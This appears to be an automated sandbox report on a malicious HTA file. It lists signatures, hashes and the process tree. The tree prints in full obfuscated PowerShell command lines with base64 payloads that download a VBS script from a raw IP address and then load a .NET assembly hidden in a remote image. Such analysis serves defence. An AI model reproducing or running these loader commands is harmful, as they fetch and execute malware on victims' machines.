Analysis

  • max time kernel
    117s
  • max time network
    118s
  • platform
    windows7_x64
  • resource
    win7-20240903-en
  • resource tags

    arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system
  • submitted
    28-01-2025 08:47

General

  • Target

    maybegetbestresultsforfreshfruitskissingaroundtheglobalforyou.hta

  • Size

    489KB

  • MD5

    eef89c197ece4474ec384b05605ea5a2

  • SHA1

    5cfea8d7a298c750f94c7099d8f0caf06769e7ae

  • SHA256

    bb1335089156b719f0f0bc2bbff00223be438742317b106484071be0f175702b

  • SHA512

    e6ad3af108ea231ee3004c78767739e0917de533a19d57be866eb9a2a04ace6bd8cbf974f1479bb3cb395887dea93af5f9819d012a3ad804a01df40c4a3eab3d

  • SSDEEP

    768:PEppjTsqUYHtObsa/ZHI8PbG2ZDxQAU0AGFtzXhyT8HPFAyRfSyn0qivXE1yGK3P:m2XPQf/GFtzXhyTGPFAyjn6

Malware Config

Signatures

  • Blocklisted process makes network request 3 IoCs
  • Evasion via Device Credential Deployment 1 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

    Using powershell.exe command.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 7 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • Modifies Internet Explorer settings 1 TTPs 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 2 IoCs
  • Suspicious use of WriteProcessMemory 24 IoCs

Processes

  • C:\Windows\SysWOW64\mshta.exe
    C:\Windows\SysWOW64\mshta.exe "C:\Users\Admin\AppData\Local\Temp\maybegetbestresultsforfreshfruitskissingaroundtheglobalforyou.hta"
    1⤵
    • System Location Discovery: System Language Discovery
    • Modifies Internet Explorer settings
    • Suspicious use of WriteProcessMemory
    PID:592
    • C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\system32\cmd.exe" "/c POweRSheLL -EX BYpass -noP -W 1 -C DevICeCReDeNtIalDEPLoyment ; IEX($(iEx('[SYsTEM.TEXT.eNcOdIng]'+[cHAr]58+[CHAR]58+'UtF8.gEtStRING([sySTem.COnveRt]'+[CHar]0x3a+[CHAr]0X3a+'FROMBasE64STrinG('+[CHaR]0X22+'JHduM2xLdSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFkRC1UeVBlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1NZU1iZVJERUZJbml0SW9OICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJ1ckxtb24iLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEliLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBHT2N4cEJQekZGLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB0aEx5bUMsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBIRlpaTyxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQWNaV0J5RVApOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5hbWUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgImdTSVRsdyIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5hTWVzcEFjZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB3VUcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkd24zbEt1OjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTkyLjMuOTUuMjI5L0ZPUi1YTFNzLUxNT05EQVlZWVlNUERXLWNvbnN0cmFpbnRzLnZicyIsIiRlTnY6QVBQREFUQVxzd2VldG5lc3Nnb29kZm9ybWlsa2FuZHN3ZWV0bmVzcy52YnMiLDAsMCk7U1RhclQtU2xFZXAoMyk7SW5Wb2tFLWV4cHJFc3NpT04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRFTnY6QVBQREFUQVxzd2VldG5lc3Nnb29kZm9ybWlsa2FuZHN3ZWV0bmVzcy52YnMi'+[ChaR]0X22+'))')))"
      2⤵
      • System Location Discovery: System Language Discovery
      • Suspicious use of WriteProcessMemory
      PID:2320
      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        POweRSheLL -EX BYpass -noP -W 1 -C DevICeCReDeNtIalDEPLoyment ; IEX($(iEx('[SYsTEM.TEXT.eNcOdIng]'+[cHAr]58+[CHAR]58+'UtF8.gEtStRING([sySTem.COnveRt]'+[CHar]0x3a+[CHAr]0X3a+'FROMBasE64STrinG('+[CHaR]0X22+'JHduM2xLdSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFkRC1UeVBlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1NZU1iZVJERUZJbml0SW9OICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJ1ckxtb24iLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEliLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBHT2N4cEJQekZGLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB0aEx5bUMsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBIRlpaTyxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQWNaV0J5RVApOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5hbWUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgImdTSVRsdyIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5hTWVzcEFjZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB3VUcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkd24zbEt1OjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTkyLjMuOTUuMjI5L0ZPUi1YTFNzLUxNT05EQVlZWVlNUERXLWNvbnN0cmFpbnRzLnZicyIsIiRlTnY6QVBQREFUQVxzd2VldG5lc3Nnb29kZm9ybWlsa2FuZHN3ZWV0bmVzcy52YnMiLDAsMCk7U1RhclQtU2xFZXAoMyk7SW5Wb2tFLWV4cHJFc3NpT04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRFTnY6QVBQREFUQVxzd2VldG5lc3Nnb29kZm9ybWlsa2FuZHN3ZWV0bmVzcy52YnMi'+[ChaR]0X22+'))')))"
        3⤵
        • Blocklisted process makes network request
        • Evasion via Device Credential Deployment
        • System Location Discovery: System Language Discovery
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:2472
        • C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe
          "C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\8d7_himk.cmdline"
          4⤵
          • System Location Discovery: System Language Discovery
          • Suspicious use of WriteProcessMemory
          PID:2112
          • C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
            C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESB617.tmp" "c:\Users\Admin\AppData\Local\Temp\CSCB616.tmp"
            5⤵
            • System Location Discovery: System Language Discovery
            PID:2748
        • C:\Windows\SysWOW64\WScript.exe
          "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\sweetnessgoodformilkandsweetness.vbs"
          4⤵
          • System Location Discovery: System Language Discovery
          • Suspicious use of WriteProcessMemory
          PID:2900
          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -Command "[System.Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('JABvAHIAaQBnAGkAbgBhAGwAVABlAHgAdAAgAD0AIAAnAHQAeAB0AC4AMwAzADQAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAcABwAHAAcAByAG8AYwBzAGkAcwAvADkAMgAyAC4ANQA5AC4AMwAuADIAOQAxAC8ALwA6AHAAdAB0AGgAJwA7ACQAcgBlAHMAdABvAHIAZQBkAFQAZQB4AHQAIAA9ACAAJABvAHIAaQBnAGkAbgBhAGwAVABlAHgAdAAgAC0AcgBlAHAAbABhAGMAZQAgACcAIwAnACwAIAAnAHQAJwA7ACQAaQBtAGEAZwBlAFUAcgBsACAAPQAgACcAaAB0AHQAcABzADoALwAvAHIAZQBzAC4AYwBsAG8AdQBkAGkAbgBhAHIAeQAuAGMAbwBtAC8AZABhAHgAdwB1AGEANgAzAHkALwBpAG0AYQBnAGUALwB1AHAAbABvAGEAZAAvAHYAMQA3ADMANwA2ADkANgAxADcAMQAvAGgAZQBrAGUAMgBwAG0AdABlAHUAdwA4AHMAcQBzAHAAbABoAGsAbAAuAGoAcABnACcAOwAkAHcAZQBiAEMAbABpAGUAbgB0ACAAPQAgAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAOwAkAGkAbQBhAGcAZQBCAHkAdABlAHMAIAA9ACAAJAB3AGUAYgBDAGwAaQBlAG4AdAAuAEQAbwB3AG4AbABvAGEAZABEAGEAdABhACgAJABpAG0AYQBnAGUAVQByAGwAKQA7ACQAaQBtAGEAZwBlAFQAZQB4AHQAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABpAG0AYQBnAGUAQgB5AHQAZQBzACkAOwAkAHMAdABhAHIAdABGAGwAYQBnACAAPQAgACcAPAA8AEIAQQBTAEUANgA0AF8AUwBUAEEAUgBUAD4APgAnADsAJABlAG4AZABGAGwAYQBnACAAPQAgACcAPAA8AEIAQQBTAEUANgA0AF8ARQBOAEQAPgA+ACcAOwAkAHMAdABhAHIAdABJAG4AZABlAHgAIAA9ACAAJABpAG0AYQBnAGUAVABlAHgAdAAuAEkAbgBkAGUAeABPAGYAKAAkAHMAdABhAHIAdABGAGwAYQBnACkAOwAkAGUAbgBkAEkAbgBkAGUAeAAgAD0AIAAkAGkAbQBhAGcAZQBUAGUAeAB0AC4ASQBuAGQAZQB4AE8AZgAoACQAZQBuAGQARgBsAGEAZwApADsAJABzAHQAYQByAHQASQBuAGQAZQB4ACAALQBnAGUAIAAwACAALQBhAG4AZAAgACQAZQBuAGQASQBuAGQAZQB4ACAALQBnAHQAIAAkAHMAdABhAHIAdABJAG4AZABlAHgAOwAkAHMAdABhAHIAdABJAG4AZABlAHgAIAArAD0AIAAkAHMAdABhAHIAdABGAGwAYQBnAC4ATABlAG4AZwB0AGgAOwAkAGIAYQBzAGUANgA0AEwAZQBuAGcAdABoACAAPQAgACQAZQBuAGQASQBuAGQAZQB4ACAALQAgACQAcwB0AGEAcgB0AEkAbgBkAGUAeAA7ACQAYgBhAHMAZQA2ADQAQwBvAG0AbQBhAG4AZAAgAD0AIAAkAGkAbQBhAGcAZQBUAGUAeAB0AC4AUwB1AGIAcwB0AHIAaQBuAGcAKAAkAHMAdABhAHIAdABJAG4AZABlAHgALAAgACQAYgBhAHMAZQA2ADQATABlAG4AZwB0AGgAKQA7ACQAYwBvAG0AbQBhAG4AZABCAHkAdABlAHMAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACQAYgBhAHMAZQA2ADQAQwBvAG0AbQBhAG4AZAApADsAJABsAG8AYQBkAGUAZABBAHMAcwBlAG0AYgBsAHkAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAFIAZQBmAGwAZQBjAHQAaQBvAG4ALgBBAHMAcwBlAG0AYgBsAHkAXQA6ADoATABvAGEAZAAoACQAYwBvAG0AbQBhAG4AZABCAHkAdABlAHMAKQA7ACQAdAB5AHAAZQAgAD0AIABbAEMAbABhAHMAcwBMAGkAYgByAGEAcgB5ADEALgBIAG8AbQBlAF0ALgBHAGUAdABNAGUAdABoAG8AZAAoACcAbQBhAGkAbgAnACkALgBJAG4AdgBvAGsAZQAoACQAbgB1AGwAbAAsACAAWwBvAGIAagBlAGMAdABbAF0AXQAgAEAAKAAkAHIAZQBzAHQAbwByAGUAZABUAGUAeAB0ACwAJwBmAGEAbABzAGUAJwAsACcATQBTAEIAdQBpAGwAZAAnACwAJwBmAGEAbABzAGUAJwApACkA')) | Invoke-Expression"
            5⤵
            • Blocklisted process makes network request
            • Command and Scripting Interpreter: PowerShell
            • System Location Discovery: System Language Discovery
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:1484

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Local\Temp\8d7_himk.dll

    Filesize

    3KB

    MD5

    4802194ea401fa1e6bcbfb8e9f32b648

    SHA1

    98ce376f986f421f297f8b866942f75a42476110

    SHA256

    c60a5287b8d5519edc01333baadf928a31ac24e8920e23ab397caa99ebc52eff

    SHA512

    ea0902ed09c057a4a933fff50f79b7eabb37a556441c41d576cf0e9bd59f04d2599a552acd662160c71210421082cceca1bab46287d4801e1a46d935fa0efb32

  • C:\Users\Admin\AppData\Local\Temp\8d7_himk.pdb

    Filesize

    7KB

    MD5

    7b54669b27f0412843ae2d8bacf3e2c1

    SHA1

    4d4c87f78121b30be4e02082bdbc6cae9d8b3f39

    SHA256

    f18a385dca3f5b8ac219e75dd41bb85212b1a0b136ed5bbbb43e151051970e1a

    SHA512

    328aebefecd99bd4e4eae8be1348bb20662a5b4953a73e4613d4876d86e6f619ba42eb2ed23169b9e576f4bf771e25b3cdb155cf62d66dc6aba5dce20f24b7ed

  • C:\Users\Admin\AppData\Local\Temp\CabF1E0.tmp

    Filesize

    70KB

    MD5

    49aebf8cbd62d92ac215b2923fb1b9f5

    SHA1

    1723be06719828dda65ad804298d0431f6aff976

    SHA256

    b33efcb95235b98b48508e019afa4b7655e80cf071defabd8b2123fc8b29307f

    SHA512

    bf86116b015fb56709516d686e168e7c9c68365136231cc51d0b6542ae95323a71d2c7acec84aad7dcecc2e410843f6d82a0a6d51b9acfc721a9c84fdd877b5b

  • C:\Users\Admin\AppData\Local\Temp\RESB617.tmp

    Filesize

    1KB

    MD5

    01e6dcd18a95c9e51b2082ed03ae0007

    SHA1

    f7ba93c17def9c10126fdb20988f001eb1e325df

    SHA256

    182d0ac83d8ab49e2b4771b69352b72d22852138d3e4d0f050b84ad625607230

    SHA512

    d45725ea253ed223d637933b323143dcf1e86545a5ba0ad340896a8cc8e204e81f68cd823ab0037314bd767f19e13c95f8430264e5ef2eba62f413627a3232e5

  • C:\Users\Admin\AppData\Local\Temp\TarF211.tmp

    Filesize

    181KB

    MD5

    4ea6026cf93ec6338144661bf1202cd1

    SHA1

    a1dec9044f750ad887935a01430bf49322fbdcb7

    SHA256

    8efbc21559ef8b1bcf526800d8070baad42474ce7198e26fa771dbb41a76b1d8

    SHA512

    6c7e0980e39aacf4c3689802353f464a08cd17753bd210ee997e5f2a455deb4f287a9ef74d84579dbde49bc96213cd2b8b247723919c412ea980aa6e6bfe218b

  • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\H1Y6UYU0WZL98K5ZQXND.temp

    Filesize

    7KB

    MD5

    364244399286edf8cd4d82eb10d31c4e

    SHA1

    b83f80cf253692068f5899e8167200db581e353f

    SHA256

    37f7668270c316a2656c0864fbfc3f40917402552235b9527e20c571d7c3c7c9

    SHA512

    4490e308e3d2d86f56becb1a7c66bbf4b21861a432b3f64083d72ed02145a4b2e3fbfd6f6305376cdb3d86e5efb9f10ab94b1605414dd964b480afde5bac82fc

  • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms

    Filesize

    7KB

    MD5

    f21b97dded633397c325efc9ffb555b5

    SHA1

    01167fb8d4140dff3c91982059fe30a2c3770d9f

    SHA256

    e4c9e795b4327aaeb41b92f52eabb850020bfa06fee1f9b2b2f20cfd7c1a03fe

    SHA512

    aa4ec1bd1b903602bf24bab2b607b4db0f929003a8c2cef1ee683bec0db4aca7d87b32a38d8e4caec833236b5f5770dff567b195c87b2147bcefcf7e28004d4b

  • C:\Users\Admin\AppData\Roaming\sweetnessgoodformilkandsweetness.vbs

    Filesize

    212KB

    MD5

    a83ab6160f8b81c477554fa0a525af7a

    SHA1

    78092735fba37245ba6dbe825797b394afab9600

    SHA256

    16e8d67f35501bb8cd8b97d525e9cec94c016a823d722e04e043d535375f8b5c

    SHA512

    ec55a422d53a07d014955dfb43c7889732d1f9652666f6886ed8b54d287b4e2f7def4d596dd29981032d4782b81f181f0d88983e5764a9aed8420b8c6ad5ee3a

  • \??\c:\Users\Admin\AppData\Local\Temp\8d7_himk.0.cs

    Filesize

    479B

    MD5

    3cafbfc34807b6dcc444198d49a41310

    SHA1

    7c8b63188b6d218abc99dfe6fd92cdc73461df20

    SHA256

    aa84f7f260d5403f852d166803cafaef04bc46e0ba419050bfe4111b09f8c73f

    SHA512

    731a56b1ff679a66acb8a523de0ec26ce27aac1b93a0cd84e5c4de6f66ee89f85cafb118dd8feeae95e04d0d430829190690114b8e73083188814e307ba2cb27

  • \??\c:\Users\Admin\AppData\Local\Temp\8d7_himk.cmdline

    Filesize

    309B

    MD5

    0ab767eebe762c3cbe6402e48fd3c958

    SHA1

    771e239d8498af42e50d744e65550138d947bfe2

    SHA256

    faf1c57cc531f5b7c6f9375ad33bdee70c4f12a6f5622395021b8c4d65f81434

    SHA512

    5407c17302ab08ffefeebb9aa048382215e2d5086311f083be10f4ca0943803d82ce54e5d71e3acd13ea7903d983c55a322edba8bd2d66803b5cad0d9891ac09

  • \??\c:\Users\Admin\AppData\Local\Temp\CSCB616.tmp

    Filesize

    652B

    MD5

    53f1740173246237f07ca3b6de692ba9

    SHA1

    9d844269b5e870bef09fe8ec70c9e30d4680f67b

    SHA256

    b8a17735484afc68ced8e02f2ac8ba65798fc094b14073644cdc147b3fc0431c

    SHA512

    9181579acec9fa232072b76013596f7bb0406ba6b8b772111368c4f0b8220136defb35295b081dde0570dcfdc6aafaa333541f5c78ac03740566408d6801bc50

  • memory/592-0-0x0000000002BF0000-0x0000000002C10000-memory.dmp

    Filesize

    128KB

  • memory/592-1-0x0000000002BF0000-0x0000000002C10000-memory.dmp

    Filesize

    128KB